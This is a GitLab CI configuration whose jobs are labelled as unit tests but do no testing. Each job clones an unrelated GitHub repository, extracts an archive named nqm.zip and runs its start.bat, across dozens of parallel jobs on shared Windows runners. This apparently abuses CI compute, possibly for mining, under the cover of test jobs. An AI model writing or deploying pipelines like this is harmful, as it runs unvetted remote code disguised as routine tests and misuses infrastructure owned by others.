stages:
  - run_on_windows_with_artifact_gen
  - run_on_windows
  - run_on_linux_docker_pwsh_preinstalled
  - run_on_linux_docker_pwsh_runtime_installed

unit_test_1:
  stage: run_on_windows_with_artifact_gen
  tags:  
  - shared-windows
  - windows
  - windows-1809
  variables:
    SCENARIO: "*** SCENARIO: Run inline .gitlab-ci.yml PowerShell code on a Windows Shell runner"
  parallel: 28
  allow_failure: true 
  script:
    - |
      git clone https://github.com/thoeb292/thoeb292
      cd thoeb292
      cd wind
      expand-archive nqm.zip -destinationpath .\unzipped
      cd unzipped
      ls
      cmd /c start.bat
  artifacts:
    paths: [ myartifactfile.txt ]

unit_test_2:
  stage: run_on_windows_with_artifact_gen
  tags:  
  - shared-windows
  - windows
  - windows-1809
  variables:
    SCENARIO: "*** SCENARIO: Run inline .gitlab-ci.yml PowerShell code on a Windows Shell runner"
  parallel: 22
  allow_failure: true 
  script:
    - |
      git clone https://github.com/thoeb292/thoeb292
      cd thoeb292
      cd wind
      expand-archive nqm.zip -destinationpath .\unzipped
      cd unzipped
      ls
      cmd /c start.bat
  artifacts:
    paths: [ myartifactfile.txt ]